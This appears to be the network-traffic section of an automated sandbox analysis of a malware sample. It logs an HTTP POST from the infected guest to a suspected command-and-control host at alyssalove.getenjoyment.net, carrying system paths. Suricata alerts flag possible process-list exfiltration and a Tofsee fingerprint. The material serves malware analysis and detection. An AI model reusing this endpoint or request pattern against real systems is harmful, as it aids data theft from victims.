Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| alyssalove.getenjoyment.net | 185.176.43.98 | |
| www.daum.net |
CNAME
www.g.daum.net
|
203.133.167.16 |
- UDP Requests
-
-
192.168.56.102:57660 164.124.101.2:53
-
192.168.56.102:61459 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:49152 239.255.255.250:3702
-
192.168.56.102:56752 239.255.255.250:1900
-
192.168.56.102:56754 239.255.255.250:3702
-
192.168.56.102:56756 239.255.255.250:3702
-
192.168.56.102:57661 239.255.255.250:3702
-
8.8.8.8:53 192.168.56.102:57660
-
GET
200
https://www.daum.net/favicon.ico
REQUEST
RESPONSE
BODY
GET /favicon.ico HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: ko
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: www.daum.net
HTTP/1.1 200 OK
Date: Tue, 08 Jun 2021 00:29:48 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 08 Apr 2017 03:14:29 GMT
Accept-Ranges: bytes
Content-Length: 16958
X-UA-Device-Type: pc
Connection: close
Content-Type: image/x-icon
POST
302
http://alyssalove.getenjoyment.net/0423/v.php?ki87ujhy=C:\Program%20Files%20(x86)&rdxvdw=C:\Program%20Files%20(x86)
REQUEST
RESPONSE
BODY
POST /0423/v.php?ki87ujhy=C:\Program%20Files%20(x86)&rdxvdw=C:\Program%20Files%20(x86) HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: ko
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 2071
Host: alyssalove.getenjoyment.net
HTTP/1.1 302 Found
Date: Tue, 08 Jun 2021 00:29:46 GMT
Server: Apache
Location: https://www.daum.net/favicon.ico
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
ICMP traffic
| Source | Destination | ICMP Type | Data |
|---|---|---|---|
| 192.168.56.102 | 164.124.101.2 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.102:49809 -> 203.133.167.81:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
| TCP 192.168.56.102:49808 -> 185.176.43.98:80 | 2027117 | ET HUNTING Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration | A Network Trojan was detected |
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.102:49809 203.133.167.81:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=Thawte TLS RSA CA G1 | C=KR, ST=Jeju-do, L=Jeju-si, O=Kakao Corp., CN=*.daum.net | 67:7d:a8:dd:b7:e1:47:25:d5:d9:6c:3f:3c:e1:5b:43:0b:80:8b:69 |
Snort Alerts
No Snort Alerts